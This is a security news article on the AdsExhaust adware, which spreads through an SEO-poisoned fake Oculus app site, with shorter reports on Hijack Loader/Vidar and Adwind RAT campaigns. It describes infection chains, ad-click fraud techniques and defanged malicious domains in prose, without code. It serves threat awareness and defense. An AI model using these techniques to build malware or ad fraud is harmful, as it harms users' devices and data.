A new campaign is tricking users searching for the Meta Quest (formerly Oculus) application for Windows into downloading a new adware family called AdsExhaust.
“The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes,” cybersecurity firm eSentire said in an analysis, adding it identified the activity earlier this month.
“These functionalities allow it to automatically click through advertisements or redirect the browser to specific URLs, generating revenue for the adware operators.”
The initial infection chain involves surfacing the bogus website (“oculus-app[.]com”) on Google search results pages using search engine optimization (SEO) poisoning techniques, prompting unsuspecting site visitors to download a ZIP archive (“oculus-app.EXE.zip”) containing a Windows batch script.
The batch script is designed to fetch a second batch script from a command-and-control (C2) server, which, in turn, contains a command to retrieve another batch file. It also creates scheduled tasks on the machine to run the batch scripts at different times.
This step is followed by the download of the legitimate app onto the compromised host, while simultaneously additional Visual Basic Script (VBS) files and PowerShell scripts are dropped to gather IP and system information, capture screenshots, and exfiltrate the data to a remote server (“us11[.]org/in.php”).
The response from the server is the PowerShell-based AdsExhaust adware that checks if Microsoft’s Edge browser is running and determines the last time a user input occurred.
“If Edge is running and the system is idle and exceeds 9 minutes, the script can inject clicks, open new tabs, and navigate to URLs embedded in the script,” eSentire said. “It then randomly scrolls up and down the opened page.”
It’s suspected that this behavior is intended to trigger elements such as ads on the web page, especially considering AdsExhaust performs random clicks within specific coordinates on the screen.
The adware is also capable of closing the opened browser if mouse movement or user interaction is detected, creating an overlay to conceal its activities to the victim, and searching for the word “Sponsored” in the currently opened Edge browser tab in order to click on the ad with the goal of inflating ad revenue.
Furthermore, it’s equipped to fetch a list of keywords from a remote server and perform Google searches for those keywords by launching Edge browser sessions via the Start-Process PowerShell command.
“AdsExhaust is an adware threat that cleverly manipulates user interactions and hides its activities to generate unauthorized revenue,” the Canadian company noted.
“It contains multiple techniques, such as retrieving malicious code from the C2 server, simulating keystrokes, capturing screenshots, and creating overlays to remain undetected while engaging in harmful activities.”
The development comes as similar fake IT support websites surfaced via search results are being used to deliver Hijack Loader (aka IDAT Loader), which ultimately leads to a Vidar Stealer infection.
What makes the attack stand out is that the threat actors are also leveraging YouTube videos to advertise the phony site and using bots to post fraudulent comments, giving it a veneer of legitimacy to users looking for solutions to address a Windows update error (error code 0x80070643).
“This highlights the effectiveness of social engineering tactics and the need for users to be cautious about the authenticity of the solutions they find online,” eSentire said.
The disclosure also comes on the heels of a malpsam campaign targeting users in Italy with invoice-themed ZIP archive lures to deliver a Java-based remote access trojan named Adwind (aka AlienSpy, Frutas, jRAT, JSocket, Sockrat, and Unrecom).
“Upon extraction the user is served with .HTML files such as INVOICE.html or DOCUMENT.html that lead to malicious .jar files,” Broadcom-owned Symantec said.
“The final dropped payload is Adwind remote access trojan (RAT) that allows the attackers control over the compromised endpoint as well as confidential data collection and exfiltration.”
